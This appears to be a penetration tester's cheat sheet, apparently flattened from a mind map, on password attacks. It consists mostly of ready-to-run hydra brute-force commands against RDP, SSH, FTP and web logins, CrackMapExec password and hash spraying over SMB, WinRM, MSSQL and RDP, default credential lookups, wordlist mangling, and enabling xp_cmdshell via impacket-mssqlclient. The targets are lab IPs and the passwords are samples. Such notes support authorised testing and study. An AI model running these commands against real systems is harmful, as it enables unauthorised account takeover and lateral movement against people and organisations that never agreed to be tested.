TIP
Attempt default credentials where applicable
hydra -L user_list.txt -P password_list.txt -M pub_targets.txt rdp
hydra
hydra -L user_list.txt -p password123! -M pub_targets.txt rdp
crackmapexec smb $ip -u users.txt -p passwords.txt --local-auth --continue-on-success
enable_xp_cmdshell
impacket-mssqlclient sql_svc:'Dolphin1'@10.10.165.148 -windows-auth
seclists/Passwords/Default-Credentials
./creds search apache out
./creds search apache out
seclists/Passwords/Default-Credentials
Remember to test default creds!
crackmapexec winrm $ip -u users.txt -p passwords.txt --continue-on-success
TIP
If you have a username, try variations of the username and username related passwords against services 2.0-Enum Hints and Misc
TIP
Smart with smaller wordlists and build it up
suppose the user "jack" was found, use variations to try and auth to applications
test a set of "default"(ish) passowrds against all services
user_verbose.txt
jack
Jack
jack@domain.com
Jack@domain.com
for u in $(cat users.txt); do hydra -l $u -P passwords.txt -M targets.txt rdp -V -t 4; done
for u in $(cat users.txt); do hydra -l $u -P passwords.txt rdp://172.16.162.12 -V -t 4; done
for each user in a user list...
in case standard approach fails on rdp
standard (single user + password file)
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://$trgt1
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://192.168.219.201
name2user.py
Create a files containing username related passwords
Create a files containing username variations
Manual
multi target (single user + password file + target file)
hydra -l <user> -P /usr/share/wordlist/rockyou.txt -M targets.txt ssh
non standard port (user file + password file + custom port)
hydra -L users.ext -P passwords.txt -s 2222 ssh://$trgt1
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
rdp spray
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
post-based
TIP
use hydra-Coption for colon wordlists
admin:admin
admin:password
tomcat:s3cret
etc.
multi target (single user + password file + target file)
hydra -l <user> -P /usr/share/wordlist/rockyou.txt -M targets.txt ftp
standard (single user + password file)
hydra -l itadmin -P /usr/share/wordlists/rockyou.txt ftp://192.168.219.202
Brute
basic auth
ssh
user2pass.py
jack
Jack
admin
Admin
password
Password
default_pass_list.txt
cat pwd.txt | rsmangler --captical --file - > mangled.txt
web
ftp
rdp
xp_cmdshell whoami
CrackMapExec
TIP
If login fails, try again without the domain or with --local-auth
CrackMapExec
smbclient //$trgt1 -U domain\\username%password
Spray As Domain user
Spray As Local user
password policy
Spray services SMB, LDAP,FTP, WINRM. RDP, MSSQL etc., As Local user
Password Spray
Spraying
Hash Spray
smbclient
Spray SMB, LDAP, FTP, WINRM. RDP, MSSQL As Domain user
crackmapexec smb internal_target_medtech.txt -u joe -p Flowers1 --pass-pol
crackmapexec smb $ip -d <domain> -u users.txt -H hashes.txt
crackmapexec smb $ip -u users.txt -H hashes.txt --local-auth
crackmapexec smb $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec winrm $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec mssql $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec ftp $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec rdp $ip -u users.txt -p passwords.txt --rdp-timeout 30 --continue-on-success
delete line & rerun